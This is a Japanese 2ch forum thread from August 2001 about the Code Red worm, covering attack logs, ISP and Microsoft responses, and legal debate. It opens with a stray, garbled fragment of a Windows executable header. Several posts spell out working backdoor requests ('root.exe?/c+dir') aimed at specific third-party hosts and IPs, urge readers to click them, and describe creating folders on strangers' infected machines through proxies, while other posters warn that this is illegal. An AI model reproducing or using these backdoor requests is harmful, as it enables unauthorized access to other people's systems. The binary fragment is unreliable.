ｴ ﾍ!ｸ Lﾍ!瑞This program must be run under Win32
$7 PE L ^B* 氏
これこのことかい？

>>502
たぶんこれ
http://www.zdnet.co.jp/news/0108/02/e_vamosi.html

>>498
巨大な赤丸、Code Red Iのものと思われる。局所的感染を繰り返す IIの
分布は、正確な情報はないのかも。

http://www.ae.wakwak.com/~sysportcore/sysport/kb/security/coderedworm.htm
から引用

> seculity.nlのデータから、CodeRed IIについてだけ
> アタック数の自己相関係数を計算してみました。
> 24時間の周期性があります。これは同じサイトが、
> 24時間ごとにリブートし再感染しているためだと思います。
> ということは、9月30日までこんな調子で続くということですね。

>>505 さんきゅ。

> もし，これからの数週間にインターネット接続が遅く
> なるようことがあったら，誰のせいにすればいいのだろう？
> 中国人のせいにもできるし，Microsoftのせいにもできる。
> あるいは，米国政府のせいにすることもできる。けれども
> 恐らくは，いまだにパッチをあてていないIISサーバの管理者
> を責めるのが，いちばん適当だろう。

激しく同意。

>>508
でも感染者の相当数はアプリを入れた時に、一緒にIISを
突っ込まれたことに気づいていないユーザだろうからね。
もう管理者云々という問題じゃなくなってる。MSのポリ
シーが最大の問題じゃないのかな

中国からを　装った　毛唐がやったに一票
そのほうが自然だ

直接関係無いけど、こんなん出てました。
http://www.asahi.com/national/update/0809/016.html
バックドア使う奴もマジで逝ってよしになるでしょう・・・

>>509
うんうん。その通りだと思う。

しかしどんなプログラムもある程度以上の規模
になると「絶対安全」ってのは無いことは明らかだし、
だからといって「多機能危険より小機能安全を選べ」と
いうのを一般に浸透させるのはムリと思うっす。

Windows Update をもっと進化させて、クリティカルな
バグは自動更新とかするしかないのかな？
でもそうすると、その機能を使って悪戯する奴が絶対
出てくるし．．．

>>511
> 電子メールの内容を「通信の秘密」にあたると判断
ナイス警視庁。

大学の学生でも簡単にサーバ立ち上げてそれこそマルチメディア時代といって
やってる時代に管理者を責めてもはじまらんぞ。なんの解決にもならん。それほど
インターネットが一般化したって事。幼稚園児に政治の話をしても理解できないのと同じ。
やはり仕組みを変えるしかないだろう。

>>504 亀レスすんません。
eeye.comに出てる逆アセで、月の比較後にjnb short命令があり、NOPでつぶす
のが正解だった。time_tの4バイト比較ではなく2バイトだ。鬱。
これ以上は厨房に利用されるのでよしときます。

>>513　エロ画像ﾊｱﾊｱ

>>511
ＩＤパスワードの必要が無い完全公開状態のバックドアにこの判例がそのまま当てはまるか？
マナーとしてはアクセスする事が良い事だとは思いません。

自分トコのサーバ、今アクセス認証にした。
そうしたらアクセスログの xxxxxx〜が消えて
211.***.***.***- - [09/Aug/2001:15:51:23 +0900] "GET /default.ida HTTP/1.0" 401 313
みたいになってスッキリ見やすくなった。

>>517
あてはまらんしょ。

>>511
うーん、推定されるようなやわなパスを使うやつも逝ってよしだと思う…。

>>517
法的な定義「通信」ではないので、「通信の秘密」にはなりませんが、
もともと、不正アクセス防止法に引っかかるのでは。
見えることと、見せることは違いがあり、バックドアは運用管理者が公開
する意思が明らかにないものですし。鍵が掛かってなかったら入った、
では、言い訳は。

>>521
きいてもいないのに「うちの鍵はあきっぱなしですよー」っていい続けている家なんだけどね。

鍵がかかってないドアから入るなら問題なし。
だけどこの場合は壁に大穴ぶち開けられてるような状態だからダメ。

鍵開いてるから、入ってもいいかな。
誰も居ないから盗んでもいいかな。
誰もが最初から犯罪者ってわけじゃなく、だんだんと感覚が狂って
いくのかもね。

>>522, >>523
というわけで、法律とはまったく理不尽なものです。はい。

また今日中に新スレの予感・・・

XXXは61ばっかり（ひとつ65がいた）あまりにも多いので
逆引きする気力が・・・
Excelか何かに適当に整形したログぶち込んだらISP名が自動的にでる
マクロってない？

>>523
阪神大震災の時ならOK

タイトル考えるの大変だね〜

>>527
言い出しっぺの法則。

人数の問題を除いて考えると、罹患サーバの管理者を不正アクセス防止法で
検挙できないの？
無罪になるためには、自身が被害者であることを立証しないと駄目って事で。

>>529
って言うか、昨日900糞だ人は
ﾋｻﾝだったよ〜(w

>>524
じゃ　どうやって　Web見るんだ？

>>528
それでもダメ。
とゆーか不正アクセス禁止法の条文読め。

ここの警告ページいい感じ　既出だったら素満
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

>>531
最悪、警告しても放置したまま応じなければ、損害賠償の対象にはなるように思われ。

>>535
残念ながら既出です。

>>534
だって、本当にワームなの？
実はバックドア仕掛けたくて成りすましてる奴もいるかもよ？
立証責任はワームらしきアクセスを行ってる管理者にあるでしょう。

>>534
OKわかった。相手が気づかなければいいんでしょ。

ってことで、今度からjpドメインからXXXタイプのワームが来たら、
警察に告訴しよう。

index.htmlおいてなくてさ、httpルート以下全部見えるサイトって結構あるよね？
サイト管理者は http-root/おいでやす.html　からたどれるとこしか見せるつもりないと主張したとしよう。
その場合サイト管理者がみせたくないと「考えていた」ファイルみたら？

自宅にある週に1時間くらいしか使わない2000に入ってましたv(^-^
どんな経路で感染したんかな〜

>>541
それは故意に一般公開してるとしたら
文句言えないな。

バックドア叩くのは不正アクセス禁止法第三条第二項の２に引っかかる
ワーム撒くのは不正アクセス禁止法第三条第二項の３に引っかかる

ただワームみたいな本人の意思によらない自動処理の場合どう判断されるかは知らない。


>>541
「アクセス制御機能」が存在しないので問題なし。
パスワードかかってたらダメ。

>>525
>というわけで、法律とはまったく理不尽なものです。はい。

それはそのとおり。

ただしその状態に甘んじているだけのやつは虫けら以下のカスです。はい。

>>544
だろ、だからワームが本人の意思では無いっちゅう証拠を挙げる責任は
管理者にあるだろ。
＞ワーム撒くのは不正アクセス禁止法第三条第二項の３に引っかかる
だいたい警告されているのに、なぁーーーんの対処もしていなかった
点で使用者責任は生じてるわけじゃん。

>>542
そこら中から感染するから、わくわくするようなモンではない。
というか、駆除はお墨ですか？

>>542
こういうの読むと自宅のWin2000が心配になってきた・・・
ルーターの設定が間違っていないことを祈る・・・

>>548
今の状況だと、１０分繋げるともれなく罹患します。
年為

>>544
ふむふむ。そうするとこないだの「サクセス顧客名簿流出事件」は
ダウンロードしたほうは不正アクセス防止法違反にならないのか。
あ、俺は終わった後知ったから取ってないよ(ｗ

>>545
というわけで順法的に各所に対処してる漏れは逝ってきます。では・・・

>>546
不正アクセス禁止法って親告罪だっけか？
そうだったら俺が間違ってる。
そうじゃなかったら捜査は警察の仕事だ。

使用者責任に関しては民事になると思う。
この場合は自分で調べないとダメだな。

>>547
ネットから切り離して駆除したあと放置中です
盆休みの間に再インストールします

さっき○○○に電話した。
３日前からウチのドアガチャガチャやってたやつ。
支社に電話したら本社の鯖管から折り電。
「フィルターではじけないですか？」なんてボケたこといってた。
サーバ全部やられてどうしようもない状態らしい。
おまけに｢これは実際にはどういった障害が出るウィルスですか？｣とか聞いてきたよ。
思わず殺意を抱いた瞬間。

>>552
被害届の間違いだったかなぁ。ごめんね。
検察に直接告訴状を持っていく手もあったけ？

>>554
　そこんとこから食い込んでコンサルタントになるよろし。
　銭とれるでぇ。

>>549
そうだよねぇ・・・
会社の鯖２台とも今日だけで２００回ドアたたかれてるし・・・
ますます心配

ふと思った。これが電話だったら大変だろうなあ。

>>556
だから、co.jpドメインが晒されること少ないのかぁ。
変だと思ってた。

>>556
だねぇ〜(w
でも業界国内最大手だぜ、そこ。
たとえ支店だろうがOCNエコとか使ってるんじゃ...

>>559
ﾜﾗﾀ

>>560
噂のアレですか？

>>560
晒しちゃえ、晒しちゃえ。

>>558
リンリン鳴って健康を害したという訴訟が頻発して弁護士儲かるかと思われ。

>>564
　一日400回以上だから、マジノイローゼになるよなあ。
　しかも電話使えない状態になっちまうし。

かかってきた電話取った人間が突然デタラメな番号に
ひたすら電話かけまくる様子想像しちまったじゃねーか（ｗ

>>564　携帯だともっとひどいかも？　何処もはやっぱり儲かるね

>>566
人間に感染するワームですか？（ｗ

>>555
直告してもハイテク捜査は検察では無理。手足が無いから。
結局警察に逝けと言われるのがオチでしょう。

iModeのJavaとかLモード電話ならまるっきりありえない
話じゃないかもね。

>>568
　夏風邪？とか思ったけど、ワームだからサナダムシとか
　そういうものか。

>>571　ﾜﾗﾀ

>>563
晒しちゃったら向こうの担当者に晒したのが俺だってばれるのでやらない。

ちなみにOCNはサイトの表示更新したって言ってきたけど...
あれ目立つと思う人手ぇ〜挙げて!

>>560
じゃあ、君の話を又聞きした第三者(ぷ)が晒せばOKだ！

560の友人登場きぼーん

>>573
もう指摘するのもうんざりだが、あれだとWin2KProのユーザーは気が付かないと思われ

>>573
トップページにあるので＠ＮＩＦＴＹの100倍目立ってます！ (鬱

じゃぁヒントだけ。
ゼネコン
○○○

IPはやめとくね。
でも、もう回線切ってあると思うよ。

>>573
まだ大手が自社内の問題に対処しきれていないのが原因だと思われ。
大体大規模ネットワークの処理が終わったら、一斉に表示されると
おもう。

>>577
トップページにあるだけで目立ってますか...(鬱

>>578
ゼネコンならちょいとだけ許す。ほ〜んととでもない会社のIPが
いっぱい有ったよ。
藍屋の白袴。

>>580
ていうか、MSのトップページ、素人には一瞬新製品の宣伝に見えるぞ(藁

>>581
いや、あんなとこでもこんな回線使ってんだ〜とか思った。

http://ueno.cool.ne.jp/zeiger/CodeRedProve.zip

こんなもんみつけた。
今更感はあるけどね。

>>584
なにこれ？

>>584
禁煙中らしいね。

>>582
いまMSのトップ見てきた。
たしかに、あれじゃ新製品の宣伝だよ > MS

>>585
あれですよ、あれ。

FireWallの内側から串通って来るCode Redは、ステルス串
通ってるのよね？

内側から外側への80塞いで、明示的に串使わないと外部に
アクセス出来ないようにしてるとこの内側からはこないよね？

>>585
攻撃受けた数をカウントしてくれるらしい(藁
ジョークソフトみたいな物かなぁ。

>>588
ステルス串か、ただのＮＡＴでしょう。

>>588
舌足らずでした。そのとおりです。

http://www.ocn.ad.jp/
さどまいんどだけっす

>>590
あ、そうかNATもありますね。忘れてた。Ｔｈｘ。

>>592
OCNのトップページは
http://www.ocn.ne.jp/
です。

>>592
つーか、あれじゃフツー見んぞ。
みんな人事だと思ってる。

お、普通に戻ってる。
こんなに下がってるのも珍しい。

う〜ん、一時はチャット状態だったからねぇ〜

あげ。

テスト

600。
関係ないけどコミケあげ。

おー人事おー人事

>>581
紺屋の白袴

この説明は初心者に判りやすくて吉。
http://www.npa.go.jp/hightech/notice/code_red2.gif

>>600
ぐわー。明日からじゃん。まだなんもやってねーよ。

俺はおしごとー
おつかい頼もう

>>578
あれ。そこって前スレかどっかで晒されてたよね？
大○○

>>600 ああ、祭りか…そうだ、祭りがあった…ぁー…

もう、CodeRed本とか出てるんだろうなぁ。きっと。

RoadLanner(BRL-01) なんだけど、CodeRed受けたら設定が狂った。
WAN側のDHCPと、NAT変換がOFFになっちゃうー。

なるほど、そうですか。

>>535
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
なるほど。まとまってて良いよ。次のスレの>>1に書く事を推奨。

>>608
あ。そのネタいただき！(藁

ソフトメーカー勤務の友人より電話。
友人「お前の所の鯖のログ、くれ。」
ワシ「はぁ(ﾟдﾟ)？何に使うんだ？」
友人「営業。」
どうやら感染したIPは金になるらしい。
社員みんなでjpの鯖ipをかき集めてるんだとさ。あらあら。
とんだ赤玉景気ですな(藁

>>608
原稿を落とした言い分けにもいい鴨。

アルファーとＤＥＶＩＬ６６６っていうところとＥＯネットからやたら
61で始まるＩＰからポートスキャンが来るんだけどこれＣｏｄｅ　Ｒｅｄ？？

>>609
BRL-04F使ってるけど
きのう　port80あけてる方のマシンが変になった
ルータにpingも通らなくなったよ。
ランボードかと思ったけど、もしかしたらルータだったのかも

アメリカから久しぶりにNNNが来た。

ZDNetの「Code Redはログからアシがつく」って記事
>原理的にはCode Red IIの攻撃を「黙らせる」こともできるだろう。
って部分、バックドア侵入を煽ってるとしか思えないよなぁ

裏ツールサイトでcode-red便乗遠隔操作ツールがあった(藁
串対応なのでセキュリティーもばっちり(ﾟдﾟ)ｳﾏｰ
コマンドプロンプトだけどね。
「dir」とか打つだけ。間抜けで良い。

>>618
匿串つかえばよかろう。でもログは残るなあ。
聞いた事も無い国の串を使えばログを取り寄せるのは無理だね(藁

>>619
URLきぼんぬ

>>621
ここじゃ言えねえ。有名な所だよ。

ここ厨房臭くなってるな

コラコラ、はしたない真似はお止め>>621

夜になってきましたな（ぼそ

とりあえず、今日は新スレは建てずに済みそう。

>>618
これやね。確かに「バックドアから黙らせちゃえ」って感じだな。
http://www.zdnet.co.jp/broadband/0108/08/cr2.html

静かになってきたね。この調子で今日は終われるかな。

>>627
運用管理なんかやったこともない人間の記事なので仕方も有るまいが
いいかげんにせ〜と言いたい・・・

http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/prom/137249
やっとMSが重い腰を上げたようで・・。

・・で、コレは誰の問い合わせを対象としてるんでしょう？
サーバー管理者？

CordRedのログを某ISPに送ったら俺を発信者と勘違いして
警告メールくれやがった…。情けねぇ…。

>>631
そんなISPは晒してやれ

>>631 ・・・絶句。

61.*.*.*で国内からのものは殆どODN。肝心のODNの反応は
http://www.odn.ne.jp/counter/codered.html

>>634
ユーザ間の問題であってISPは警告しかしないと。
だめだこりゃ。

>>634
ＯＤＮ、確かにひどいね。　俺、月曜日にＯＤＮからのアクセスを
ログから取り出して送ったんだけど完全に無視されている模様。
ＩＳＰ変えよかな。最近どこも定額だしな。

>>630
とりあえずコピペ
--
　マイクロソフトは2001年8月8日、同社のWebサーバーソフト「Internet Information
Server/Services（IIS）」を狙ったワーム「Code Red」に関する専用の電話問い合わせ窓口
（0120-69-0196）を設置した。土日や休日も含めて24時間体制で問い合わせを受け付ける。

　同社ではCode Redに関して、Webサイトで修正プログラムを配付している。この修正プログラム
の適用法などについて、電話によるユーザーの問い合わせに応じる。

　Code Redは、IISを稼働しているWindows NT 4.0/2000マシンを対象としたワームで、感染した
サーバーはWebページが書き換えられるほか、他のサーバーへワームの感染を広げたり、DoS攻
撃を仕掛ける。また、ハッカーがサーバーにアクセスできる“裏口”を設ける変種なども登場してお
り、被害は依然として続いているという。（中田　敦）

■問い合わせ先
・マイクロソフト IISセキュリティ情報センター　電話0120-69-0196

>>634
うちは211.***のODN多いよ。オレもODNだから仕方がないかも
しれないけど、衰える気配は全くなし。

ちゃんと対策してんのかなぁ？

>>638
いいなあ。おれもODN入ろうかな(藁

しかし疲れたな...お盆前だというのに
もっとも、もう打つ手なしって所なんであきらめモードですが....
個人ユーザーに対策徹底させるなんて絶対無理だわ

p.s.
バックドアを使ったIISジェノサイダーが発生してIIS絶滅
->収束なんてなったら無力感倍増だな

>>634
KDDIの貸サーバーはFWでアタックパケット遮断してたよ
個人ユーザーとの差はなんだ!!

ＯＣＮもがんばって赤虫発信してる。

>>641
どうやら、できる装置を持ってないような気がしてきた。

BSD系のPPPとかは、パケットフィルタをユーザ別設定にして、必要ならRADIUS
で集中管理できるけど、ISPの使ってるADSLやダイアルアップのコンセントレータ
には入ってないのかも・・。

リムネットの勘定奉行から来たよ・・・・

>>627
おいおい、不正アクセス幇助だろ、この記事（ｗ

>cmd.exeがroot.exeと名を変えコピーされる。
NTもIISも知らんから、↑が何を意味するのか解らんのよね。　はぁ

command.comならわかりやすいんだろうか？
あるいはshと似てないけどsh

DOS窓がのファイル名が変わるってことですか？
＞６４６

中小のプロバは比較的対応いいよ。
少なくとも返信くるからね。

今回のことで端末やネットワークに割としょぼい名前つけてる奴が多いって分かった。

>>627
ちょっと詳しすぎだよね。

>>647
いや、、root.exeの方が、、
sambaのSWATの様な、ブラウザで弄れる設定ツール？

>>648
見た目はそうだけど、厳密には違う。
そいやWinってRUNDLL.EXEってもっと強力なシェルもあったな。

数名によるアタックでもプロバに報告した方が良いんでしょうか？
たかが数回のアタックで・・・とか思われると嫌なので迷ってるんですけど。

>>653
ご面倒でなければ違いをご説明いただけませんか？

>>652
ネタじゃないよね。
設定ツールどころか、あらゆる実行ファイルを弄べるの。
NTのコマンドラインって結構そろっているので実質的にフリーハンド

今夜のおすすめバックドアあいてるエロサイトのＩＰまだぁー？

dir したい場合は root.exe?dir なの？
出力返ってこないけど。

root.exe?/c+dir

これ、20日から挙動が変わるんですよね？
この頻度でDosアタックされたらマジ告訴も検討なんですけど。

>> 653
回数は関係ないと思われ。
俺は1回だろうが報告、
同じプロバイダー内からまた来たら
これ以降の報告が必要か先方に確認している。

>>656
root.exeで調べてみたらMSが意図的に仕掛けたセキュリティホール
だったそうですねｗ

そんなん普通想像つかんわ。　てっきりADMIN用の管理ツールかと

>>658-659
不正アクセスはﾀｲｰﾎされちゃうよ

>>659 thanks_!!!

管理者への報告、お願い、苦情テンプレート共有しませんか？
国内、英語圏なら拙いながらもなんとか書けるのですが、一番腹立たしいシナ、チョンあたりはお手上げです。

>>655
シェルって言葉がわからないと説明は難しいかも
よくDOS窓と勘違いされるコンソール画面はコンソールデバイスを使う
プログラムがあると自動的に開かれるもの。
シェルもまたプログラムの一つ
さらにDOSエミュレーターはまた別物

フォーマットとか悪質な事抜きで、管理者に気づかせる術
ありませんか？ echoとか

>>667
一筆したためる

>>662
それは偽情報だ
というか書いた人恥さらし

net send * せんせーこの機械red codeにやられてまーす。

>>667
>>276

バックドアからdel root.exeしても
「不正ｱｸｾｸ働いてごくろーさん」なわけだよね？（藁

>>668
したため方解らず

まあ、root.exe消しても止まらないしね。

>>667
http://www.nefty.net/desktop/haritsuke/img-box/img20010808002632.gif
机にこれ張りましょう。
すぐわかる。

>>674　一礼だってばさ。

11時になってからテレホの影響かアタック回数がかなり増えた。

>>670
これを裏口使って送るのが、一番罪が軽くて効果がありそうだね。

今日はアクセスログが昨日より伸びない。
ワームもお休み中？

増えた人、減った人
IPの違いか！？

>>675
これの使用条件は？
勝手にホムペでつかってもいいのかな

>>678
なんで罪を犯してまで（ｗ

>>680
減ったと思ったらファイヤーウォールが無力化されてた。
どさくさにまぎれて・・・

61.***だけどテレホで増えた。
さすがODN。

恥かしいけど俺が作った。
勝手につかってちょ

「Code Red拡散の責任は“管理者の不注意”だけではない？」
http://www.zdnet.co.jp/news/0108/09/nai_virus.html

>>681
絵のセンスはないんでスマソ

2000のデスクトップて何処なんでしょ
￥WINNTにそれらしきディレクトリ見当たらなかったんですが

http://mentai.2ch.net/test/read.cgi?bbs=hack&key=997233994&st=6&to=6&nofirst=true
これクリックすると不正アクセスですか？

>>688
初心者板へGO!

jinse.iriro.com

今朝 DTI のサポートに会員らしきユーザからの Code Red の
アクセスをまとめて 170 件くらい送ったのだが何の連絡もない。
と言っている間に川崎 AP からまたアクセスがあった。
何やってんだ。感染マシン晒すぞ...

jinse.iriro.com
いや、まぁ色々有るけどさ…。

>>688
ドキュメント＆せっちんグのなかの各ユーザーの中

>>688
C:\Documents and Settings\

>>690
そりゃかわいそう

どもです >694,695
今来た人はNTでは無い様で windowsしか無かったので
/c+mkdir+"c:\windows\ﾃﾞｽｸﾄｯﾌﾟ\このPCはWORMに感染してます"
/c+mkdir+"c:\windows\ﾃﾞｽｸﾄｯﾌﾟ\邪魔なので首吊って氏んで下さい"

としておきましたｗ　と言うのは冗談でちゃんと丁重に書いときました

>>697
うわあ〜

C:にwin98とかME、D:にNTな人だったりして。

>>688
マジでやったの？
捕まるぞ。

そそＣとは限らんですよね。
いざという時のためにＦにしてる。
まさかＦとは思わんでしょ。

一応怖いので漏れ＋匿名の2段串噛ませておきましたｗ　どきどき

>>697
いや、びっくりするけど俺だったらありがとうだな。
それ以外何もしてなければ (藁

それは、さらに情状酌量の余地が無くなるなり。

ですかねｗ

今同じサーバから秒間６発来た（ｗ

>>688
晒しage

数ヵ月後に不正アクセス禁止法で逮捕者続出しそう（ｗ

Code Red のバックドア使って >>697 するワーム誰か作って。
一発目はﾈﾄｶﾌｪからオイラが発射したるよ。

晒されるか、、今後実行しても書くのは控えようｗ

たとえば被害者ログ請求→サーバー管理者　コードレッドのログでうざいのに
そんなことしてられるかゴルァァ　だと思う

>>709
こーゆーセキュリティ診断してくれる親切ワームって見たことない

net send localhost [messages]もいいやね。

WORMと言うか、ポート80で待ち受けてXXX来たら
C:\見て、"Documents and Settings"、無かったらWindows\ﾃﾞｽｸﾄｯﾌﾟ
に適当に書くのなら簡単に作れそ。

うちはhttpd稼働してるから80使えんけど。

>>713
localhost は使えなかったと思う。

前に穴ふさぐワーム作った人ってつかまっちゃたんだよね。
それがなけりゃこんな騒ぎとっくに終わってるような
きがするんだが。

sageでやっても全然沈まん

>>714
うちはhostsに書いてあるんだがこれって自分で書いただっけ
かなあ？

>>718
舌足らずだった。
IPベースではなくNetBIOSベースなので、ちゃんとNetBIOS名でホスト名入れなければだめ。
よってlocalhostだめ。

>>718の言ってることがよくわ

http://***.***.***.***/コードレッド�Uに感染してるぞ馬鹿タレ/
って連打すればエラーログに残るかな。
近い将来やっと気付いたドアホがログ見てプルプルするの。

感染に気付かない様な奴はLOGの中見ずにそのまま削除　に１万ガウス

プルプルされてもなぁ・・・

ログを集計していて気づいたんだけど夕べ１時間に４７回も同じところ
から来ていた。
で、おかしいと思ってログ全体でそのアドレスgrep|wcしたら123回も
来ていた。これって絶対変だと思うんだが新種かなあ。
それともこのアドレスの後ろにたくさんいるんだろうか？

３日ほど前なら１時間に１００回近くアタックするところが２、３回あったよ。

今夜はniftyとso-netからガンガンドア叩かれてる。

C: を見て D: を見て E: を見て・・・・とやっていたら急に重くなったので
良く見ると "0 bytes Free" で AUTORUN.INF がある。
するとすぐに接続不能に…
きっと相当ビビったんだろうな（ｗ

あ、そういやdir a:やるとガコガコ鳴るのか（ｗ

>>728
を、それいい!

>>728
ナイス！

☆★☆★☆★☆★☆★　ここまで読んだ　☆★☆★☆★☆★☆★

寝る
おやすみ、みんな

>>728-730
やめとけ。前例あるんだぞ。

>>731
うまいと思ったんだけど。

■■■■ここまで読んだ■■■■

寝ます。
またね

>>724-725
それはどんな名前よ？
イントラネット内のマシンからじゃねーか？

>>728
windowsにはejectは無いのか？（ﾜﾗ

>>733
Macならできるのに

アドミンに電話したらログ送れって言われたんだけど黒氷って特定のパケットだけ抽出することってできたっけ？

画面コピーのビットマップでもいいんじゃない。

霧番ゲッターに荒らされ、前スレの２がおっ勃っちまってます！！

あれは何がしたいんだろうね。ちょっと理解出来ない。

あぁ、分かった。このスレが本スレだと気付かず古いスレの
続きを作ってしまったのか。なんか、悪い奴ではなさそうだな。

１の対処法を読むと…
インターネットに繋がっててパッチ当ててなかったWindows2000のIISマシンは、
他のバックドアが入れられて、
そこから前のバックドアroot.exe, explorer.exeが消されて、
IISのログも消されて、
レジストリも他のバックドア用に変えられている
(ついでにパッチも充ててやる、ってできるのかな)可能性も考えると、
対処完璧に見えて、実はバックドアがあるマシンができちゃうって話ですよね？

だから、インターネットに繋がってるパッチ当ててなかったwindows2000のIISマシンは
すべてについて、OSを入れなおせという話ですよね？？

っていう話を企業にしたら、企業はやってくれるんでしょうか。(w

http://www.ehouse.ne.jp/Scripts/root.exe?/c+dir+"a:\"
皆様の1クリックで1企業が助かります

感染していた。
やべ、と思って対策したんだが、数日後プロバイダから注意のメールが来てしまった。
ご迷惑おかけしました。

>>740
そこまでの制圧はできんが、まぁOS入れ直しはやらせておきたい。

親切なんだか、困ったちゃんなんだか....（笑）

>>741 やめとけって。法律読んで、判例も調べようね。

>>741
どっかにうぷしてgooにでもやってもらうか。

>>740
まぁそこらで感染させられてる奴に期待するのはどうかと思うが、
ヤラレちゃった可能性ある人はそれくらい神経質になったほうがいいと思われ。
Tripwire とか入れて、ちゃんと理解してる人ならともかく。

なるほど、サーチエンジンがクリックした場合は誰が犯人なんだろ。
ってリンク貼った奴か。

今日は、しみじみクン来なかった… 残念。

2chの過去ログって結構googleとかでひっかかるから
何年もにわたって >>741 が検索ロボットにクリックされ続ける
可能性もあるんかな。

>>749
　惚れたな。

>>749
アパッシュダンス丸木くんじゃだめか？

>>735
BlackICEの最新版なら、証拠ログ残す設定にしておけば、
ICEのディレクトリに、拡張子encが出来るから、それを提出。
このファイル、NTServerか、Proにも管理ツール入れれば開くことが
できるとおもう。

フロッピーがこがこ。ﾏﾝｾｰ!

STARTコマンド使えば、CodeRed注意喚起のページを画面に出しておくことも出来るのかな？

rundll使ってCD取り出しとか出来ないかな？
うぃぃぃぃん

何か新種のCodeRedが出てないか？
一分間に同じサーバから20発ぶち込まれたぞ。

NがXになってるとかいう寝言じゃないよな >>757

こっちにも来てる気がする
Xで秒間隔の連続爆撃だよな？

>>758
もちろんXだが、Xってアタック対象のIPに連続して送りつけるような事するの？

日付で攻撃パターンが変わるのでは？

カナダから本日一通目のNが到着。

おめでとう

ルーターの向こう側から複数のPCが協力して連続攻撃
って可能性はあるかな。

うちは150発ぶちこまれた。
でもこういうのは、前から時々あったよ。
どさくさに紛れてなんかやってる奴居てもおかしくない。

08/09　ステータス
合計５２２匹　JP５３匹　TW６匹　残りは　チョソ

アタックログを公開しちゃう所もでてきました・・・
ここから
http://www.hart.co.jp/spam/

211.13.215.64 - 211.13.215.127
Natural Identity

あ、そこ知ってる。Datascope用のTCP/IPスタック出すはずが
出さずに方向転換してしまったところだ。

　　┏━━━━━━━━━━━━━━━━━┓
　　┃　 　 コードレッド男爵があらわれた! 　 　 ┃
　　┗━━━━━━━━━━━━━━━━━┛

　　　　　　　|
　　　 ＼／￣￣＼／
　　 ／　| ｀皿´　;::|
　 < <￣| 　 　 /;:::|￣
　　＼＼＼＿/_／＼
　　　 ＼＼　|
　　　　　＼　　 　 ＼
　　　　　　|　　　　|＼＼
　　　　　　＼　　　＼　> >
　　　　　　　　 >　　　|／＼
　　　　　　　 //　　／　　　＼
　　　　　　 //　 ／　　　　　　）
　　　　　 //　/〜〜〜〜〜〜
　　　　 （（　（
　　　　　 ヽ＼＼
　　　　　　　 ヽ＼＼__
　　　　　　　　　 ヽ＼ |
　　　　　　　　　　 しU

┏━━━━━━━━━━━━━━━┓
┃コードレッド男爵の放つ　　　　　　　 .┃
┃強烈なトラフィック攻撃！　　 　 　 　 ┃
┗━━━━━━━━━━━━━━━┛

　　　　　　　　|
　　　 ＼／￣￣＼／　　／￣￣￣￣￣￣￣￣￣￣
　　　　　|::; ｀皿´　|　　＜　トトトトトトトトト、トラフィック！！
　　　 ￣|:::;ヽ　　　|￣　　＼＿＿＿＿＿＿＿＿＿＿
　　　　　＼__＼_／＼
　　　　　 / 　　　 ＼
　　　　　//|　_　　 ｌ |　　＿
　　　　/| |／　ヽ　 | |／っ､､ヽ
　　　/　＼/⌒゛゛/ ＼/ 　 ```
　　/　　　|　　 /　ヽ。　　　　ヽ。
　/　　　　| 　| |　　　　。　　　　。
　〜〜〜 |　|| |　　　　　。　 　　。
　　　 　　 | / | |　　　　　　ヽ　 　｡　　　｡
　　　　 　//　| |　　　　　　　 　 ＿＿＿
　　　　 //　　| |　　 　　　　　／´∀｀；;::＼　＜グワァァァァ！！重い！！
　　　　//　 　| |　　　　　　 /　　　　/::::::::::|
　　　　U　　　U　　　　　　 | ./|　　/:::::|::::::|
.　　　　　　　　　　　　　　　| |｜／::::::::|::::::|

誰よ朝っぱらからこんなこと書いてんの(w　（デモワラタ）

面白い！のであげ

おはよ
だれ？うまいじゃん。>>770>>771

ひさしぶりに速報版へ逝ったら、ほのぼのしちまったい。

http://kaba.2ch.net/test/read.cgi?bbs=news&key=997392520

>>770 ここで二日酔いが促進した

>>767
反スパムなんて言って自分が迷惑を被るのはｲﾔだけど、そのLOGを元に
他人がアタックを受けても全然平気。
所詮はその程度の会社なんだね。

ぷららユーザーからのCode Redのログを送ったら。
・全ユーザーに注意喚起します。
・送付いただいたログを元に、個別対応も行います。
と返事があった。
比較的マトモな対応。

ﾁｮｿとかどうやってわかってんの？

ログを送ったけど、dion は返事もなし。

>>767
アタックログ公開もいいけど、ドキュソのような気がする。根拠：
・8/1-5のデータをCodeRedIIと思っていそうだ。
・でかい丸が日本と勘違いしている。
・CodeRedIIが近傍アドレスにばら撒くんで、オランダではあんまり観測できないことを
判ってない。
・「PPPでサーバ立てる＝わざとでは(憶測)」、とは恐れ入った(藁
いや、もうどうでもいいというか、自分も最初は勘違いしたが・・・

>>780
DION、うちは対応してもらえたみたい。

DIONスタンダードか専用線で繋がってる会社のサーバーから
Code Red来てて、管理者にメールしようにもwhoisにメアド
の記載無し。FAX入れても効果無し。
仕方ないので上流にあたるDIONにログ付きで対応を以来した。
弊社のユーザーですので弊社より警告、対応を行いますって
メールが来て、確かにその会社からはCode Redこなくなった。
対応はその時の受け付けた担当者によりけりでしょうね。

>>778 Plalaはとりあえず返事だけはマトモにくるよ。
しかもうちには同じメールに対して違う担当から2通も来た。
それはそれで別の意味で心配になるのだが…

Hotmail が Code Red に感染
ttp://www.zdnet.co.jp/news/0108/10/b_0809_04.html

>>784
あまりにも情けなさ過ぎるぞ＞Microsoft

ttp://sv1.happo-tv.co.jp/Scripts/root.exe?/c+dir+"c:\"

善意なんだろうけど、ダメなんですよね・・・

AT&Tは行き先が会員のport80宛てパケットを転送しないように
設定したみたい。今回はしかたがないのかもしれないけど、
あまりport塞がれるのはちょっとなぁ･･･　今まで特にport塞ぐことの
なかったところだけに、ちょっと住みにくくなった感じ。

そして当方のhttpのportを変更した途端にAT&T内からのCODE RED
が･･･　昨日やっと警告メール出したみたいだし、感染ユーザに
個別にサポートする気もないんだろ。

この状況なんだ！
それくらい、いいのでは？
いつまで経っても治まらんじゃんかよ！

へっぽこオヤヂちゅくしょーヽ(｀Д´)ﾉ
うぜー

これはいいでしょ？　とっても良い感じでは？

http://210.172.180.148/scripts/root.exe?/c+dir+"e:\新しいフォルダ"

NTのレジスト User数より CodeREDに感染した台数の方が
多くてビルがご機嫌悪いってホント？
バックドアは便乗で使われるかもね〜

>>791
レジストしてもろくにサポートしないんで、見限って登録しない人が多いだけでわ。

次は８００の人が立てるの？

odn.ad.jp　改善の兆しが全く見られません
ﾌﾛﾋﾟｰｶﾞｺｶﾞｺしてみます

>>790
激藁ﾀ

